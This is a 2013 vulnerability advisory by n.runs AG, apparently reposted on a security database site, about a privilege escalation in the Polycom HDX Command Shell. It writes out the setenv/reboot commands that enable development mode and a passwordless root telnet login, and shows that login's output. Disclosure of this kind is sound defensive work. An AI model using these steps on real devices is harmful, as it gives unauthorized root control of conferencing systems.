Polycom HDX Privilege Escalation

2013.03.16
Credit: Moritz Jodeit
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

n.runs AG http://www.nruns.com/ security(at)nruns.com n.runs-SA-2013.001 15-Mar-2013 ___________________________________________________________________________ Vendor: Polycom, http://www.polycom.com Affected Products: Polycom HDX Series Affected Version: < 3.1.1.2 Vulnerability: Polycom Command Shell Grants System-Level Access Risk: LOW ___________________________________________________________________________ Overview: The Polycom Command Shell is a command-line based administrative interface to the Polycom HDX system. It can be accessed either via a RS-232 serial connection or via telnet on port 23. Description: The Polycom Command Shell can be used to view and also change several settings of the system. However it can also be used to get system-level access (i.e. root access) to the HDX system. The "printenv" and "setenv" commands can be used to read and write variables respectively which are stored in flash memory. The easiest way to get root access to the HDX system is to enable the "development mode" of the system which will then enable a telnet server where a root login without a password is possible. In order to enable the development mode, the "devboot" U-Boot environment variable must be set. This can be done through the Polycom Command Shell with the following commands: $ cu -l ttyUSB0 -s 9600 -> setenv othbootargs "devboot=bogus" -> reboot reboot, are you sure? <y,n> y This will reboot the system and enable a telnet server where a login as root is possible. $ telnet 192.168.0.218 Trying 192.168.0.218... Connected to 192.168.0.218. Escape character is '^]'. hdx7000.lan login: root ## Error: "vidoutsize" not defined # id uid=0(root) gid=0(root) # uname -a Linux hdx7000.lan 2.6.18.1.p2.14 #1 PREEMPT Wed Feb 3 10:25:31 CST 2010 ppc unknown # Impact: Someone with legitimate access to the Polycom Command Shell can get direct system-level access to the underlying embedded Linux system. This can be used to further analyze the system. Solution: Polycom released version 3.1.1.2 of the HDX software which fixes this issue. It can be downloaded from the Polycom Support page at http://support.polycom.com. ___________________________________________________________________________ Credit: Bug found by Moritz Jodeit of n.runs AG. ___________________________________________________________________________ Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact security@nruns.com for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall n.runs be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages. Copyright 2013 n.runs AG. All rights reserved. Terms of use apply.

References:

http://www.polycom.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top